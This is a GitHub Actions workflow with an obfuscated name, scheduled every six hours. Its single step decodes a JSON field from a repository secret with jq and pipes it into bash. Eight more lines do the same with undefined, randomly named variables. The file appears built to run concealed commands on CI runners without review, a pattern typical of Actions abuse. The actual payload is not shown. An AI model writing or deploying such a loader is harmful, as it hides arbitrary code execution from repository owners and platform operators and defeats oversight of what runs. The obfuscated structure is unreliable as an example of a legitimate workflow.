name: chengzhuangshi6789
on:
  workflow_dispatch:
  schedule:
    - cron: '1 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chengzhuangshi6789
        env:
          v7: ${{ secrets.v7 }}
        run: |
          echo $v7 | jq -r .ia66624 | /bin/bash
          echo $a1 | jq -r .rjsi42720 | /bin/bash
          echo $siz822 | jq -r .cs1922 | /bin/bash
          echo $bq073 | jq -r .xuo9114 | /bin/bash
          echo $z6 | jq -r .n1 | /bin/bash
          echo $nbn62 | jq -r .ivzuj50 | /bin/bash
          echo $xj2128 | jq -r .f06 | /bin/bash
          echo $l076 | jq -r .ulic55 | /bin/bash
          echo $axs78547 | jq -r .c862 | /bin/bash

